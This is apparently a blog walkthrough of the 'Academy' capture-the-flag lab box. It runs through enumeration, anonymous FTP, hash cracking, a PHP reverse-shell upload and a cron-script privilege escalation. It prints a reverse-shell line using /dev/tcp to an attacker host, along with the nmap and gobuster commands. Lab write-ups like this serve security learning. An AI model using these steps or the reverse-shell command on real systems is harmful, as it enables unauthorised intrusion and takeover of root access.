Academy box — Walkthrough
Hi guys, this is the third day and third box (3D-3B for my personal reference). I will be trying to complete at least one box per day (if could two or more) so I could gain my confidence, learn new knowledge, and prepare for OSCP.
Wish me luck!
So, today I would like to work on Academy machine. Let’s get started!
################################################################ — — — — — — — — — Please read to the end! Thank you! — — — — — — — — —
###############################################################
The box
Lets get it started!
Enumeration
Nmap, same old fashioned way.
nmap -p- -T4 <Target_IP> -A -sV -oN nmap.txt
Looks like FTP is an open gate and we shall dive into it first!
FTP
We can just enter username as “anonymous” and “password” as password to login to the ftp. Then, we can see that there is a note.txt that we can download to our machine to see if it is helpful to us!
Note.txt
After opening it on our machine, it looks like we have a gold mine! We can see there is some SQL lines that trying to insert new info into the database. From here we also can see that:
1. We will need to use the StudentRegno to login to SOMEWHERE
2. There is a password hash and StudentRegno provided in the file
3. We can see there are new names appeared, such as Heath, Grimmie and jdelta.
These might be come in handy later on.
Port 80 — Http
Nothing to see here. So, we gonna find it!
Gobuster
Fire it up!
gobuster dir -u http://<Target_IP>/ -w <Wordlist_Path>
/phpmyadmin
I found this login page but not sure do we need it for now. Just keep it just for now.
/academy
Once we go to /academy, we can see this online course registration page. This is possibly where we will be using the credentials from the Note.txt.
Initial foothold?
I run the password hash on CrackStation and I get the result of the hash, which is student.
Then we can try to login, and this is the page after logged in.
After navigating for a moment, I found out that MY PROFILE provide us a place to upload a picture. I am confident this is my chance!
Crafting Payload or just changing the extension?
Now craft (or just copy from Google), a php reverse shell that we could be uploaded here. Remember to change the IP and the port to your desired ones. So, lets try it!
Note: Please remember to set up a listener to receive the reverse connection. Also, usually during photo uploads, we will only be able to upload image related extension such as jpg or jpeg but in this case, it does not filter out any extension which will save our time.
It did not trigger the shell, but not to worry, we can just trigger our own. We can go to the source code and see where is the “picture” that was uploaded just now.
Now, update our url and we will be able to see the “picture”.
Now we press on it to trigger the reverse shell. Yes, SHELL!
Now, we can upgrade our shell to a more stable shell.
python -c 'import pty; pty.spawn("/bin/bash")'And we get these:
Exploration time!
Now, we will need to navigate around the system to see what we can find. I found grimmie user which also found backup.sh.
backup.sh
It looks like this .sh can be used to escalate our privilege as it run on #!/bin/bash.
/etc/crontab
It looks ok, without anything that we can exploit on.
/includes
This is in the path /var/www/html/academy/, as we can see from here, there is a config.php that might have useful information for us.
config.php
Nice find on mysql password and user!
Tried to use it but it failed, so maybe we should try on ssh?
BECOME GRIMMIE AND ROOT?
Now, we should edit the backup.sh and make it reverse a admin privilege shell to us.
/bin/sh -i >& /dev/tcp/<Attacker_IP>/<PORT> 0>&1
Note: Remember to set up your listener.
Now, wait for a moment and we get a connection! It is root!
Voila! Another room done!
Thank you for reading my write-up. I would like to improve my write-up skills in the future and can reach me through Twitter or comments. Any sponsors also welcomed.
Twitter: https://twitter.com/curse_jk
Buy me coffee:http://buymeacoffee.com/Cursemagic
Other medium write-ups: https://cursemagic.medium.com
